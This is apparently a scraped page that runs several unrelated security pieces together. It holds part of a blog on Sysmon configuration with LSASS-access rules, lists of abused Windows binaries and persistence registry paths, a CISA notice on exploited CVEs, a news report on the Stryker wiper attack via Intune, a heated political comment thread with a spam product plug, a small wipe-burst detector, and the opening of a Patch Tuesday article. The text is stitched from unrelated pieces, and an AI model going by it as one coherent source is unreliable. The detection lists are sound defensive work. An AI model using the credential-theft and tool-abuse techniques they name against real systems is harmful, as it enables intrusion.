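        <TargetImage name="LSASS access (any mask)" condition="is">C:\Windows\System32\lsass.exe</TargetImage>
      </ProcessAccess>
    </RuleGroup>

    <!-- Assumed baseline accessors, matched on full path, never on name only.
         Keep this list minimal: code injected into an excluded process (for
         example svchost.exe) inherits the exclusion, so every entry here is
         a blind spot you are choosing to accept. -->
    <RuleGroup name="" groupRelation="or">
      <ProcessAccess onmatch="exclude">
        <Rule groupRelation="and" name="svchost to lsass">
          <SourceImage condition="is">C:\Windows\System32\svchost.exe</SourceImage>
          <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
        </Rule>
        <Rule groupRelation="and" name="WmiPrvSE to lsass">
          <SourceImage condition="is">C:\Windows\System32\wbem\WmiPrvSE.exe</SourceImage>
          <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
        </Rule>
      </ProcessAccess>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```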
Event 11: File Create
Logs file creation events. Combined with the process context, you know not just that a file was created but what created it.
Why this matters: Malware drops payloads. Event 11 shows powershell.exe created C:\Users\Public\payload.exe. You now have the full chain. By monitoring all executable file types and critical OS locations, you can detect:
- Malware dropping executables in system directories (C:\Windows\System32, C:\Windows\SysWOW64)
- Persistence mechanisms placing files in startup folders
- Driver/kernel module installations in \Windows\System32\drivers\
- DLL hijacking attempts in system directories
- Scripts being staged in temp directories
- Suspicious file creation in protected Windows folders
- Executable files created in public/shared locations that shouldn't contain them
The comprehensive file type coverage ensures you catch all executable formats Windows supports, not just .exe files. Monitoring critical OS paths catches attackers attempting to blend in with legitimate system files or establish deep persistence.
For additional file creation rules and examples to consider for your environment, see the [Sysmon Modular project's File Create section here](https://github.com/olafhartong/sysmon-modular/tree/master/11_file_create).
Events 12, 13, 14: Registry Operations
- Event 12: Registry object added or deleted
- Event 13: Registry value set
- Event 14: Registry object renamed
Why this matters: Registry persistence mechanisms (Run keys, services, COM hijacking) are everywhere in attacker tradecraft. Native Windows auditing can capture registry access, but it requires complex SACL configuration. Sysmon makes it straightforward.
Events 17, 18: Pipe Created / Pipe Connected
Why this matters: Certain pipe names are strong indicators of malicious activity, but here's the catch: attackers can (and do) randomize their pipe names. Targeting known-bad patterns will catch commodity tooling, but sophisticated actors will slip through.
The better approach: Rather than trying to enumerate all possible malicious pipe names, I recommend building a baseline of valid named pipes in your environment and then creating exclusions for those. Log everything else. This way, any new or unusual pipe that appears gets captured—and you handle the alerting logic at your SIEM where you have more flexibility.
We cover both strategies in depth in the [TrustedSec Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/named-pipes.md)—the targeted approach and the exclusion-based approach. I personally prefer the exclusion method with detection happening at the SIEM layer.
Events 19, 20, 21: WMI Events
- Event 19: WmiEventFilter activity
- Event 20: WmiEventConsumer activity
- Event 21: WmiEventConsumerToFilter activity
Why this matters: WMI event subscriptions are a stealthy persistence mechanism. These events let you see them being created. Paired with Microsoft-WMI-Activity/Operational Event ID 5858 that logs WMI errors, Event ID 5857 for providers loaded, and Event ID 5861 for permanent events, you have full redundancy in coverage.
Event 22: DNS Query
This logs DNS queries with the process that made them and is critical for detecting C2 communication, DNS tunneling, and domain generation algorithms.
Why this matters: You see powershell.exe queried evil-domain.com. Your network logs might show the DNS traffic, but without Sysmon you wouldn't know which process initiated it.
The better approach: I will be honest. On client machines this one is painful to get a good signal-to-noise ratio (SNR) from, and I prefer network management platforms. On servers, where there is more control, fewer applications loading multiple websites, and no constant stream of new entries, it is of great value, however. Use it if another solution is not available, but be aware of what role the host plays before implementing it.
A Practical Sysmon Configuration
Below is a production-ready Sysmon configuration that balances visibility with performance. This isn't a one-size-fits-all solution, so you should tune it for your environment, but it's a strong starting point.
This configuration can be copied to an XML document and applied using the Sysmon.exe process on a test system. Once tuned, you can deploy the registry value using GPO or Intune, depending on your environment. I would recommend the [Learning Sysmon video series](https://www.youtube.com/playlist?list=PLk-dPXV5k8SG26OTeiiF3EIEoK4ignai7) I recorded if you are not familiar with how to do this. I go over each event type and recommendations for each.
The XML markup of this configuration did not survive extraction; only its values remain, listed here in the order they appear:

- Hash algorithms md5,sha256,IMPHASH, followed by a False flag
- Process images: C:\Windows\System32\backgroundTaskHost.exe, C:\Windows\System32\RuntimeBroker.exe, C:\Windows\System32\taskhostw.exe, C:\Windows\System32\svchost.exe
- Ports: 443, 80, 53, 22, 3389, 5985, 5986, 445, 23, 135, 8040, 7070, 5938
- Image names: \powershell.exe, \cmd.exe, \wscript.exe, \cscript.exe, \mshta.exe, \rundll32.exe, \regsvr32.exe, \certutil.exe, \bitsadmin.exe
- Paths: \Users\, \Temp\, \AppData\, \Downloads\
- Images: C:\Windows\System32\svchost.exe, C:\Windows\explorer.exe, C:\Windows\System32\lsass.exe, C:\Windows\System32\wbem\WmiPrvSE.exe, C:\Windows\System32\svchost.exe, C:\Windows\System32\lsass.exe, \Microsoft\Windows Defender\
- File extensions: .exe .dll .sys .drv .ocx .cpl .scr .com .pif .ps1 .psm1 .psd1 .bat .cmd .vbs .vbe .js .jse .wsf .wsh .hta .msi .msp .lnk .url .inf .reg
- Directories: C:\Windows\System32\, C:\Windows\SysWOW64\, C:\Windows\, \Windows\System32\drivers\, \Windows\System32\config\, \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, \AppData\Local\Temp\, \Users\Public\, \ProgramData\, \Temp\, \Windows\Temp\, \Downloads\, \Desktop\, \$Recycle.Bin\
- Registry paths: \CurrentVersion\Run, \Services\, \Classes\CLSID\, \Image File Execution Options\, \Windows\AppInit_DLLs, \Winlogon\, \Lsa\
- Named pipes: \lsass, \ntsvcs, \scerpc, \wkssvc, \srvsvc, \winreg, \spoolss, \netlogon, \samr, \browser; pipe event type Created; images powershell, cmd.exe, wscript, cscript, rundll32, regsvr32
- DNS suffixes: .microsoft.com, .windows.com, .windowsupdate.com
Deploying Sysmon
Installation
Download Sysmon from the official [Sysinternals page](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon).
Install with configuration:
I recommend you copy the configuration shown above into an XML document and apply it.
```powershell
sysmon64.exe -accepteula -i sysmon-config.xml
```
Update existing configuration:
After tuning the configuration to your liking, you can apply the tuned config to a system using scripts, GPO, or Intune. The command below will apply the updated config.
```powershell
sysmon64.exe -c sysmon-config.xml
```
Check current configuration:
```powershell
sysmon64.exe -c
```
Log Location
Sysmon events appear in:
Applications and Services Logs → Microsoft → Windows → Sysmon → Operational
Log Size Configuration
Default log size is typically too small. Increase it:
```powershell
wevtutil sl "Microsoft-Windows-Sysmon/Operational" /ms:524288000
```
Or via GPO:
Computer Configuration → Administrative Templates → Windows Components → Event Log Service → Sysmon → Specify maximum log file size: 512000 KB
Configuration Tuning Philosophy
The configuration I provided is a starting point. I took the effort to ensure that the config would serve as a starting point for workstation and server alike. As you tune the config, ensure that you tune one for workstation and one for server. Once this is done, depending on the roles for servers and who uses the workstations, you can tune even further. Start slow and test. You need to tune it for your environment. Here's my approach:
- Start noisy, filter down: Enable more than you need initially. See what generates volume. Add exclusions for verified benign activity.
- Threat model drives filtering: What attacks are you most concerned about? Adjust your filters accordingly. If you're worried about insider threats, you might want more coverage. If you're focused on commodity malware, you can be more aggressive with exclusions.
- Baseline before excluding: This is especially important for named pipes but applies broadly. Understand what's normal in your environment before you start filtering. Otherwise, you risk excluding something an attacker is abusing.
- Test before deploying: Deploy to a test group first. Measure log volume and system impact. Adjust before rolling out widely.
- Iterate continuously: Your environment changes. So do attacker techniques. Review and update your configuration quarterly, at minimum.
- Use community resources: The [TrustedSec Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide) goes deep on each event type with practical configuration guidance. We cover strategies for named pipes, network connections, registry monitoring, and more. It's worth reading through before finalizing your configuration.
If you prefer video content, we also have a [Sysmon YouTube series](https://www.youtube.com/playlist?list=PLk-dPXV5k8SG26OTeiiF3EIEoK4ignai7) that walks through configuration concepts and practical deployment scenarios.
Sysmon Alternatives and Companions
I want to be transparent—Sysmon isn't the only option. Some alternatives:
- Velociraptor – Open-source DFIR tool with endpoint visibility
- osquery – SQL-based endpoint telemetry
- EDR-native capabilities – Many EDRs provide similar telemetry (but that's our single-source problem)
The advantage of Sysmon is that it's free, it's from Microsoft (so no third-party driver concerns), and the logs go to the standard Windows Event Log infrastructure.
What We've Built So Far
Across Parts 1-4 of this blog series, we've established:
[Part 2 - Windows Security Events:](https://trustedsec.com/blog/building-a-detection-foundation-part-2-windows-security-events)
- Logon/Logoff for session tracking
- Process Creation (4688) with command lines
- Service installation
- Scheduled tasks
Part 3 - PowerShell Logging:
- Script Block Logging (4104) for deobfuscated scripts
- Module Logging (4103) for command execution
- Transcription for full session recording
Part 4 - Sysmon:
- Enhanced process creation with hashes
- Network connections by process
- Registry modifications
- File creation
- Driver and DLL loading
- Named pipe activity
- WMI events
- DNS queries
In Part 5, we'll bring it all together—correlating across these sources during investigations and building detections that leverage the full foundation.
Resources for Going Deeper
- [TrustedSec Sysmon Community Guide](https://github.com/trustedsec/SysmonCommunityGuide) – Comprehensive documentation on each Sysmon event type with configuration strategies and examples
- [Sysmon Video Series](https://www.youtube.com/playlist?list=PLk-dPXV5k8SG26OTeiiF3EIEoK4ignai7) – Video walkthroughs covering deployment, configuration, and practical use cases
- [Microsoft Sysmon Documentation](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) – Official documentation and download
CISA Adds Five Known Exploited Vulnerabilities to Catalog
CISA has added five new vulnerabilities to its [Known Exploited Vulnerabilities (KEV) Catalog](/known-exploited-vulnerabilities-catalog), based on evidence of active exploitation.
- [CVE-2025-31277](https://www.cve.org/CVERecord?id=CVE-2025-31277) Apple Multiple Products Buffer Overflow Vulnerability
- [CVE-2025-32432](https://www.cve.org/CVERecord?id=CVE-2025-32432) Craft CMS Code Injection Vulnerability
- [CVE-2025-43510](https://www.cve.org/CVERecord?id=CVE-2025-43510) Apple Multiple Products Improper Locking Vulnerability
- [CVE-2025-43520](https://www.cve.org/CVERecord?id=CVE-2025-43520) Apple Multiple Products Classic Buffer Overflow Vulnerability
- [CVE-2025-54068](https://www.cve.org/CVERecord?id=CVE-2025-54068) Laravel Livewire Code Injection Vulnerability
These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.
[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](/binding-operational-directive-22-01) established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf) for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [KEV Catalog vulnerabilities](/known-exploited-vulnerabilities-catalog) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the [specified criteria](/known-exploited-vulnerabilities).
Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker
A hacktivist group with links to Iran’s intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker’s largest hub outside of the United States, said the company sent home more than 5,000 workers there today. Meanwhile, a voicemail message at Stryker’s main U.S. headquarters says the company is currently experiencing a building emergency.
Based in Kalamazoo, Michigan, Stryker [NYSE:SYK] is a medical and surgical equipment maker that reported $25 billion in global sales last year. In a lengthy statement posted to Telegram, a hacktivist group known as Handala (a.k.a. Handala Hack Team) claimed that Stryker’s offices in 79 countries have been forced to shut down after the group erased data from more than 200,000 systems, servers and mobile devices.
“All the acquired data is now in the hands of the free people of the world, ready to be used for the true advancement of humanity and the exposure of injustice and corruption,” a portion of the Handala statement reads.
The group said the wiper attack was in retaliation for a Feb. 28 missile strike that hit an Iranian school and killed at least 175 people, most of them children. The New York Times [reports](https://www.nytimes.com/2026/03/11/us/politics/iran-school-missile-strike.html) today that an ongoing military investigation has determined the United States is responsible for the deadly Tomahawk missile strike.
Handala was one of several hacker groups recently [profiled](https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/) by Palo Alto Networks, which links it to Iran’s Ministry of Intelligence and Security (MOIS). Palo Alto says Handala surfaced in late 2023 and is assessed as one of several online personas maintained by [Void Manticore](https://malpedia.caad.fkie.fraunhofer.de/actor/void_manticore), a MOIS-affiliated actor.
Stryker’s website says the company has 56,000 employees in 61 countries. A phone call placed Wednesday morning to the media line at Stryker’s Michigan headquarters sent this author to a voicemail message that stated, “We are currently experiencing a building emergency. Please try your call again later.”
A [report](https://www.irishexaminer.com/news/munster/arid-41808308.html) Wednesday morning from the Irish Examiner said Stryker staff are now communicating via WhatsApp for any updates on when they can return to work. The story quoted an unnamed employee saying anything connected to the network is down, and that “anyone with Microsoft Outlook on their personal phones had their devices wiped.”
“Multiple sources have said that systems in the Cork headquarters have been ‘shut down’ and that Stryker devices held by employees have been wiped out,” the Examiner reported. “The login pages coming up on these devices have been defaced with the Handala logo.”
Wiper attacks usually involve malicious software designed to overwrite any existing data on infected devices. But a trusted source with knowledge of the attack who spoke on condition of anonymity told KrebsOnSecurity the perpetrators in this case appear to have used a Microsoft service called Microsoft Intune to issue a ‘remote wipe’ command against all connected devices.
Intune is a cloud-based solution built for IT teams to enforce security and data compliance policies, and it provides a single, web-based administrative console to monitor and control devices regardless of location. The Intune connection is supported by [this Reddit discussion](https://www.reddit.com/r/cybersecurity/comments/1rqopq0/stryker_hit_by_handala_intune_managed_devices/) on the Stryker outage, where several users who claimed to be Stryker employees said they were told to uninstall Intune urgently.
Palo Alto says Handala’s hack-and-leak activity is primarily focused on Israel, with occasional targeting outside that scope when it serves a specific agenda. The security firm said Handala also has taken credit for recent attacks against fuel systems in Jordan and an Israeli energy exploration company.
“Recent observed activities are opportunistic and ‘quick and dirty,’ with a noticeable focus on supply-chain footholds (e.g., IT/service providers) to reach downstream victims, followed by ‘proof’ posts to amplify credibility and intimidate targets,” Palo Alto researchers wrote.
The Handala manifesto posted to Telegram referred to Stryker as a “Zionist-rooted corporation,” which may be a reference to the company’s 2019 acquisition of the Israeli company OrthoSpace.
Stryker is a major supplier of medical devices, and the ongoing attack is already affecting healthcare providers. One healthcare professional at a major university medical system in the United States told KrebsOnSecurity they are currently unable to order surgical supplies that they normally source through Stryker.
“This is a real-world supply chain attack,” the expert said, who asked to remain anonymous because they were not authorized to speak to the press. “Pretty much every hospital in the U.S. that performs surgeries uses their supplies.”
John Riggi, national advisor for the American Hospital Association (AHA), said the AHA is not aware of any supply-chain disruptions as of yet.
“We are aware of reports of the cyber attack against Stryker and are actively exchanging information with the hospital field and the federal government to understand the nature of the threat and assess any impact to hospital operations,” Riggi said in an email. “As of this time, we are not aware of any direct impacts or disruptions to U.S. hospitals as a result of this attack. That may change as hospitals evaluate services, technology and supply chain related to Stryker and if the duration of the attack extends.”
According to a March 11 memo from the state of Maryland’s Institute for Emergency Medical Services Systems, Stryker indicated that some of their computer systems have been impacted by a “global network disruption.” The memo indicates that in response to the attack, a number of hospitals have opted to disconnect from Stryker’s various online services, including LifeNet, which allows paramedics to transmit EKGs to emergency physicians so that heart attack patients can expedite their treatment when they arrive at the hospital.
“As a precaution, some hospitals have temporarily suspended their connection to Stryker systems, including LIFENET, while others have maintained the connection,” wrote Timothy Chizmar, the state’s EMS medical director. “The Maryland Medical Protocols for EMS requires ECG transmission for patients with acute coronary syndrome (or STEMI). However, if you are unable to transmit a 12 Lead ECG to a receiving hospital, you should initiate radio consultation and describe the findings on the ECG.”
This is a developing story. Updates will be noted with a timestamp.
Update, 2:54 p.m. ET: Added comment from Riggi and perspectives on this attack’s potential to turn into a supply-chain problem for the healthcare system.
Update, Mar. 12, 7:59 a.m. ET: Added information about the outage affecting Stryker’s online services.
If medical device companies are “fair game”, are drug manufacturers and hospitals next?
No honor among thieves??
Israel quite literally flattened most hospitals in Gaza strip. You think they won’t do the same in Iran?
What a ridiculous claim. Hamas was using hospitals as command centers,
Israel did not attack the Minab school. Just more excuses for terrorism and extortion.
Bellingcat confirms it was a US Tomahawk, something that Israel does not possess.
Yes, I frequently store my ammo next to an MRI machine.
Oh look. A brainwashed zio. Israel BOMBED HOSPITALS, SCHOOLS, MOSQUES AND AID SITES. Please have several thousand seats
Well, people voted for Hamas in the last elections held and they knew what they’re buying. So sit down son and enjoy the FO part of FAFO.
Bibi gave money to Hamas and undermined the PA. Read better child.
That doesn’t make bombing schools, hospitals etc any less of a war crime.
There is no justification for Israeli genocidal tactics and disregard of laws.
Pointing this out is not supporting Hamas either.
seeing truth is not the same as being brainwashed
there are no good bombs and bad bombs
dehumanization of people is typical brainwash agenda
why kids in Ukraine or Gaza are worse than other kids
they are if your set of rules are from hell
Couldn’t agree more.
The US killed 175 mostly children. Was that fair game?
LOL put all your security on the cloud….
“Microsoft service called Microsoft Intune to issue a ‘remote wipe’ command against all connected devices.”
Every vendor that has moved to a cloud based console has been compromised
Personally we quit using every security vendor that has moved to a cloud based console,
If I can access it on the web, so can someone else
I will stick with old school VPN and inside network please……
people with VPN on their devices were wiped, and you have it wrong.
Being connected to a cloud does not make you vulnerable, being connected to any network (even “inside”) does… good luck out there
They’re talking about using SaaS cloud consoles that directly control their entire device fleet, as opposed to only site-accessible compartmentalized consoles behind a specific private self-run VPN. That is actually not wrong, that’s absolutely the smarter play if less convenient and potentially overlook-able unless IT stays on toes. Calling a person a clown off the bat online because you haven’t even considered fully what they’re saying is pretty juvenile IMO, but we all have to grow up sometime I guess.
It’s never as simple as **cloud bad!** I’ve been in situations where similar wipe threats happened entirely “inside network”. The root-cause analysis usually points to at least two larger procedural issues:
* Errors that are not caught, causing operations to continue when they should have been stopped
* Operations that happen at scale without human oversight/approval
This company of 50k+ employees (or, maybe worse, the garbage Microsoft software they used and is used by *many* other organizations) had a way to blow away their entire IT infrastructure? That’s bonkers! Something right out of SpaceBalls: “Thank you for pressing the self destruct button.”
Thank you Ronald. I’ve been concerned about this from the start of “cloud” services. The company I was at got on that train. I think everyone for the most part has. It is just too much exposure.
I sent one of their recruiters a resume and an offer to help on LI 😉
I see all those funding cuts for national cybersecurity are working out…
The US brought back 4 avenger-class minesweepers from the mideast, they arrived in Philadelphia the same day Iran started mining the strait. If this isn’t the smartest and most deeply thought-out administration in American history, it’s certainly the one with the most brightly colored hats.
Yeah, because those ships are THIRTY YEARS OLD and we already have replacements that are ALREADY ACTIVE in the Strait of Hormuz called Littoral Combat Ships. For all the budget discussion around them, their entire mission set was designed around defense in littoral waters, such as the Strait of Hormuz. Your comment simply does not make sense to anyone actively monitoring the situation.
Not going to age well that comment….crude carriers sail in the deep waters…which is what this is all about!
Remember it’s not the physical space which needs to be cleared of mines…it’s the mindset of the insurance market…welcome to asymmetrical warfare 🙂
Littoral ships have no problems operating in deep water. They are not designed to engage true deep water navy ships in combat is all, ie they can’t hold deep water by themselves against a real navy. For that there is the rest of the US navy and navy airforce, and they have already sunk most of the Iranian navy.
The main danger isn’t mines, i.e. to set a proper minefield that would require a proper minesweep to clear requires a minelaying ship to sail uncontested through the area. For what can be placed now, the remote mine removing submersible that the littoral ships can bring is sufficient.
The current danger from Iran is not navy ships, it’s fast attack boats, and sea drones which have similar performance to fast attack boats. The Avengers have .50cal machine guns which are only intended for defensive purposes. Equivalent Soviet 12.7mm guns in the Russian Black Sea fleet have proven very unreliable at defeating Ukrainian sea drones. At best all they have done is occasionally protect the vessel they are floating on, and can do nothing about drones targeting other vessels.
What the littoral ships have is a 57mm automatic bofors, in an unmanned, fully stabilized, computer controlled radar guided mount. Which is probably the best solution to asymmetric drone and boat style naval warfare currently available.
Littoral combat ships have been marred by serious engine defects, shortened replenishment schedules and have no history of achieving anything significant in any theater yet. They’re expensive comparatively for what they are and have no track record of volume success in de-mining anything at all, anywhere. They may be theoretically capable to do that but it’s certainly not going to be as effective as a purpose-built minesweeper FLEET of smaller vessels in coordination that already existed there. Mines can be laid in an afternoon to meet your description of ‘proper’ minefield that would take _months_ to remove. LCS have never been tested against significant drone attacks, and as capable (theoretically) as Bofors guns might be against such threats attacking the ship _itself_ they’re next to useless for theater protection. Certainly a sufficiently sized swarm of inexpensive drones would be expected to achieve hits against a much, much more expensive ad hoc minesweeper role. It’s a jack of trades and an expensive one that’s never been tested, least of all significantly damaged or having achieved a significant objective requiring ASAP minesweeping. Having so few of them as we do increases the chance that one being damaged or disabled would severely compromise the minesweeping role in theater. The longer the strait remains closed, the more incompetent the administration looks as the western economies all share the burdens. LCS isn’t going to dent that outcome if Iran successfully mines it.
The T-64 began its design process circa late 1950s, T-64A entered service circa 1967 and its first combat engagement was 1992. ie if you don’t fight a war, your gear doesn’t get “proven”. This is the opportunity that will allow littoral ships to prove useful or not.
At this point in time, actual estimates of mines laid vary between 10 and 0, and estimates of sunken known minelaying ships to be something like 14. The resources required to enforce a fully closed strait don’t exist, it’s just a passage that is currently too risky for commercial insurance.
The US has more than one integrated MCM platform, including helicopter and remote submersible based systems, none of which hard require either littorals or Avengers to be present. The main threat is not mines, it’s speed boat based drones and actual projectiles including actual antiship missiles. All an Avenger can do against those threats is float there and take hits, casualties and sink.
I would not expect that swarming sea drones is an easy task, nor are they particularly cheap and I would also expect that such a swarm would be visible being prepared on the coast, which would invite all sorts of counters, not limited to aircraft or missiles/shellfire from the navy.
Launching individual sea drones stealthily is much more feasible, which is why the attack pattern looks like it does, most at the bend, but some all up and down the iranian coast.
It’s the worst test case scenario for finding out if your kit is up to task or not.
yahoo.com/news/articles/u-navy-minesweepers-assigned-middle-210524347.html
They still float, weren’t rusting to death, and were capable minesweeping craft in-theater as opposed to whatever they’re hastily bringing in RN to replace them, after the fact, because Trump apparently didn’t consider the ramifications of the Strait of Hormuz before he set it on fire at Bibi’s beckon.
Littoral combat ships have never been proven minesweepers at volume in an active theater scenario. Avenger class vessels are exactly that, and already there. Making the point about the mindless timing of their withdrawal from theater RIGHT AS THEY BECOME CRUCIAL ASSETS because of a decision to go to war (of choice) should be obvious to most, but I’ll cede that you sure don’t seem to get it.
Littoral ships are also riddled with shakedown issues and are vastly more expensive than projected, so your particular points of choice to try to explain away this tactical blunder in a war (of choice) rife with strategic blunders as far as the eye can see are pretty evenly self-blunted. Bravo sir, you could be Trump’s next Secretary of Doing War Badly, you’ve got the posturing down pat.
The littoral ships have been around for quite a while now, in the class that had the gearbox issue, that has been fixed, and the early hulls which would have been difficult to bring up to standard are in reserve. As I said in my other post, there isn’t a volume demining problem at this point in time. The fact that too much was spent on procurement is a general US procurement issue, it’s not an active service issue.
IMO no military can ever guess what its dimwit political leadership will do and at some point the equipment has to be modernized and changeovers have to occur.
They’ve been having their engines fail with seawater in oil for a while now, among other failures you’re trying to rose-color over. The math remains unchanged.
They pulled minesweepers out of the theater right as they might have become crucially integral to the “plan” that has nothing to do with strategic thought.
What would Iran have to gain from mining the Strait? As it stands, they already have the capability to attack any ships passing through the Strait as seen with the Thai ships this past week.
Additionally, their biggest trade partner, China, uses the Strait, so WHY would they mine it and risk their biggest leverage in this conflict? The backing of China, and control of this Strait is the biggest leverage Iran has.
Also, this administration is run by a bunch of p*dophiles protecting other p*dophiles, it will go down as the most shameful in modern American history.
They would have the ability to close the strait without effort to any traffic besides their own. The fear of mines is almost as great a threat to shipping as un-passable mines themselves. The ships that are passing through are all Iranian-permitted – Think about that for a quick second before you reply.
They know where they mine, they know where mines are, and others do not. That’s what you’re apparently misunderstanding about the threat. Also China apparently hedged oil bets ahead of this conflict and is in no big hurry to force reopening, they aren’t hurting particularly. They are the least affected and any Iranian effort to disrupt the western-backed economies benefits their interests. Mines can be later removed by the country that places them at any time at all. Removal by others takes a serious effort. It’s something that’s been known for decades already by everyone except apparently Donald Trump, mastermind military strategic genius that he claims to be.
Ah! Now I understand what all those weird requests from IR domains were. And to think, we are just getting started. It’s going to be a fun March, with the Ides coming up and Microsoft in some areas an already open book…
Thanks for the post and my group also thanks you, one team one goal.
PleaseJustFixIT.org #HealthSupport #OneTeam
Karma is a b. Stryker has been getting business unethically for years. Made my day.
Love this comment !!! So true.
How have they been doing business unethically? I’m not disagreeing. I genuinely do not know
Ah, what was Stryker’s MS Secure Score? Everyone with an MS 365 tenant should be concerned and hoping they didn’t miss the same control that Stryker did.
It’s unlikely Stryker will release their own Secure Score to the public, but it seems like the Stryker breach occurred due to privilege escalation due to a lack of governance controls. MS 365 users should probably be fine as long as they’re keeping an eye on their device management.
It’s likely that Stryker’s breach was due to their own fault since the breach probably occurred due to a phishing attack or something that obtained an admin’s credentials. Microsoft 365 was not the vulnerability issue.
Let’s not forget this story wouldn’t have been written if the orange one hadn’t started a war with Iran. But wait, wasn’t he supposed to be ‘The President of peace’, ‘I will focus on America’, ‘If I’m not elected, Kamala will start wars all over the world’. He’s showing his enjoyment of watching people die and inflicting suffering. And how can ANYONE believe this will end well considering he bankrupted 3 casinos. This is just the beginning of the pain the world will experience because of the actions of someone mentally ill who should be in a nursing home and not POTUS.
I like turtles
I also like turtles.
George died in 2009. Clearly the person this is about has been soulless since 2002/2003.
I think that turtles are fortunate to have a hard shell to protect them. Their domes are way better and cooler than any of our protective domes.
Pity that we have to work to protect their breeding sites.
Finding it harder and harder to not want to decimate and dismantle Israel’s ‘cybersecurity’ “program” my own self.
“A source familiar with the attack told BleepingComputer that the threat actor used the wipe command in Intune, Microsoft’s cloud-based endpoint management service, to erase data from nearly 80,000 devices between 5:00 and 8:00 a.m. UTC on March 11”
https://www.bleepingcomputer.com/news/security/stryker-attack-wiped-tens-of-thousands-of-devices-no-malware-needed/
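The quoted report describes tens of thousands of devices erased through a legitimate management command in a three-hour window, and the earlier comments point at the same root cause: destructive operations running at scale with nobody in the loop. The following is an added example, not code from BleepingComputer, Stryker or Microsoft: a sliding-window burst detector for destructive MDM actions, run over constructed audit records. The record format (`timestamp|actor|action|device`), the action names, the account names and the threshold of 25 destructive actions in ten minutes are all assumptions of this example, not the Intune audit-log schema; map your real export into the same four fields.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed record format for this example: "ISO-8601 timestamp|actor|action|device".
# This is NOT the Intune audit-log schema; map your real export into these four fields.
DESTRUCTIVE_ACTIONS = {"wipe", "retire", "delete"}  # assumed action names


def parse_record(line: str):
    """Split one constructed audit record into (timestamp, actor, action, device)."""
    ts, actor, action, device = (part.strip() for part in line.split("|", 3))
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), actor, action, device


def detect_bursts(lines, window=timedelta(minutes=10), threshold=25):
    """Alert once per actor when their destructive actions inside any sliding
    `window` reach `threshold`. Window and threshold are assumptions; tune them to
    the normal wipe rate of your tenant (a handful per day is typical)."""
    events = sorted(parse_record(line) for line in lines)  # chronological order
    recent = defaultdict(deque)   # actor -> timestamps still inside the window
    alerted = set()
    alerts = []
    for ts, actor, action, device in events:
        if action not in DESTRUCTIVE_ACTIONS:
            continue
        q = recent[actor]
        q.append(ts)
        while ts - q[0] > window:        # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and actor not in alerted:
            alerted.add(actor)
            alerts.append({"actor": actor, "count": len(q),
                           "window_start": q[0], "window_end": ts,
                           "last_device": device})
    return alerts


def build_sample_records():
    """Constructed data: one account wiping 30 devices in three minutes on the
    morning named in the quoted report, plus routine single actions by helpdesk."""
    base = datetime(2026, 3, 11, 5, 0, tzinfo=timezone.utc)
    lines = [f"{(base + timedelta(seconds=6 * i)).isoformat()}|svc-mdm-admin@example.com|wipe|DEV-{i:05d}"
             for i in range(30)]
    lines.append(f"{(base - timedelta(hours=3)).isoformat()}|helpdesk@example.com|wipe|DEV-LOST-01")
    lines.append(f"{(base + timedelta(hours=1)).isoformat()}|helpdesk@example.com|sync|DEV-00001")
    lines.append(f"{(base + timedelta(hours=2)).isoformat()}|helpdesk@example.com|wipe|DEV-LOST-02")
    return lines


if __name__ == "__main__":
    for alert in detect_bursts(build_sample_records()):
        print(f"{alert['actor']}: {alert['count']} destructive actions between "
              f"{alert['window_start']:%H:%M:%S} and {alert['window_end']:%H:%M:%S} UTC")
```

The detector fires on the 25th wipe, a couple of minutes into the burst, so it buys minutes rather than preventing the loss; the procedural fixes raised above (a hard stop on errors, human approval for operations at scale) are the control this alert complements, not replaces.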
This article about bot control issues is a sobering reminder why automated systems need proper safeguards – especially in funded accounts where you’re operating under strict drawdown rules. I learned the hard way that one poorly-configured EA can blow a challenge, so I switched to Ratio X Toolbox which gives you multiple bots for different market regimes instead of relying on a single system that can malfunction. The stress testing features actually helped me understand my max daily loss limits before hitting real money. Have you found that diversifying across different EA types helps you survive the drawdown phases of prop firm challenges?
Hey, howza boutta plug for some crap product and some totally non-profound ‘coded’ language. We need more tension, poorly done feints, and discussions of clipper ships. Otherwise, we are not fully populating the cyber-landscape with fully-featured, complex threat actors.
my sec+ training says this is nation/state sponsored. not hacktivist.
This attack shows the security vulnerability and the sophistication of Iran hacking attack.
It only works when I’m Nepal.
It seems to work fine in Brampton or any other VPN people think they all live in
I personally am voting for ‘strips you can wind there’, though you need that nonexistent time machine for that movie, too.
AI is the baby. Hail Satan! Welcome to a brand new day, Revelations Jayna!
Microsoft Corp. today pushed security updates to fix at least 77 vulnerabilities in its Windows operating systems and other software. There are no pressing “zero-day” flaws this month (compared to February’s five zero-day treat), but as usual some patches may deserve more rapid attention from organizations using Windows. Here are a few highlights from this month’s Patch Tuesday.
Two of the bugs Microsoft patched today were publicly disclosed previously. [CVE-2026-21262](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21262) is a weakness that allows an attacker to elevate their privileges on SQL Server 2016 and later editions.
